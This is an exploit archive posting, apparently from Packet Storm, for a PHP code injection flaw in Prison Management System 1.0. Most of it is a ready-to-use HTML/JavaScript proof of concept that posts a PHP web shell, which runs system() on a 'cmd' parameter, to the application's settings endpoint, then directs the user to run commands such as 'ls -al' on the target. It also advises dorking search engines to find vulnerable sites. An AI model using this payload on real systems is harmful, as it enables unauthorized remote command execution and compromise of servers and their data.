exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Prison Management System 1.0 Code Injection

Prison Management System 1.0 Code Injection
Posted Sep 19, 2024
Authored by indoushka

Prison Management System version 1.0 suffers from a PHP code injection vulnerability.

tags | exploit, php
SHA-256 | 6f0c4d0c2b30b067997ee3da24377eec3ac2089defddc71f84d051b385d7de50

Prison Management System 1.0 Code Injection

Change Mirror Download
=============================================================================================================================================
| # Title : Prison Management System v1.0 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/PHP-pms.zip |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page is designed to create a file and inject PHP code.

[+] save payload as poc.html

[+] In the line 13 , 'content[welcome]' name the file you want to create It will create a file with an HTML extension.

and in the same line, put the payload that suits you.

[+] Set your target url

[+] payload :


<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title> PHP code injection Tool</title>
<script>
async function sendRequest() {
const url = document.getElementById('url').value;
const postData = {
'content[welcome]': `<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>`
};

try {
const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded'
},
body: new URLSearchParams(postData).toString()
});

if (response.ok) {
document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';

} else {
document.getElementById('result').innerText = 'Error: ' + response.statusText;
}
} catch (error) {
document.getElementById('result').innerText = 'Error making request: ' + error.message;
}
}
</script>
</head>
<body>
<h1>Injection Tool</h1>
<form onsubmit="event.preventDefault(); sendRequest();">
<label for="url">Enter URL:</label>
<input type="text" id="url" name="url" required>
<button type="submit">Submit</button>
</form>
<pre id="result"></pre>
</body>
</html>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close